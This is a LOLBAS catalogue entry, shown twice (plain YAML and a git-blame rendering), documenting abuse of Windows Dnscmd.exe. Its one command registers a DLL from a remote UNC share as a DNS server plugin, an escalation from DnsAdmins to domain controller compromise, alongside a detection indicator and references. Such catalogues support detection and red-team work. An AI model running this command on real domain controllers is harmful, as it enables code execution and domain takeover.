LOLBAS/yml/OSBinaries/Dnscmd.yml

---
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
    Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
    Usecase: Remotly inject dll to dns server
    Category: Execute
    Privileges: DNS admin
    MitreID: T1035
    MitreLink: https://attack.mitre.org/wiki/Technique/T1035
    OperatingSystem: Windows server
Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
Detection:
 - IOC: Dnscmd.exe loading dll from UNC path
Resources:
  - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
  - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
  - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
  - Link: https://twitter.com/Hexacorn/status/994000792628719618
  - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Acknowledgement:
  - Person: Shay Ber
    Handle:
  - Person: Dimitrios Slamaris
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
    Handle: '@nikhil_mitt'
---
Changed all OSBinaries according to the new template 2018-09-24 21:59:43 +02:00			`---`
			`Name: Dnscmd.exe`
			`Description: A command-line interface for managing DNS servers`
			`Author: 'Oddvar Moe'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2018-05-25`
Changed all OSBinaries according to the new template 2018-09-24 21:59:43 +02:00			`Commands:`
			`- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll`
			`Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.`
			`Usecase: Remotly inject dll to dns server`
			`Category: Execute`
			`Privileges: DNS admin`
			`MitreID: T1035`
			`MitreLink: https://attack.mitre.org/wiki/Technique/T1035`
			`OperatingSystem: Windows server`
Major changes to Web portal - Small fixes to source files to adjust 2018-12-10 14:28:12 +01:00			`Full_Path:`
Changed all OSBinaries according to the new template 2018-09-24 21:59:43 +02:00			`- Path: C:\Windows\System32\Dnscmd.exe`
			`- Path: C:\Windows\SysWOW64\Dnscmd.exe`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Code_Sample:`
Changed all OSBinaries according to the new template 2018-09-24 21:59:43 +02:00			`- Code:`
			`Detection:`
			`- IOC: Dnscmd.exe loading dll from UNC path`
			`Resources:`
			`- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83`
			`- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html`
			`- Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp`
			`- Link: https://twitter.com/Hexacorn/status/994000792628719618`
			`- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html`
			`Acknowledgement:`
			`- Person: Shay Ber`
			`Handle:`
			`- Person: Dimitrios Slamaris`
			`Handle: '@dim0x69'`
			`- Person: Nikhil SamratAshok`
			`Handle: '@nikhil_mitt'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`---`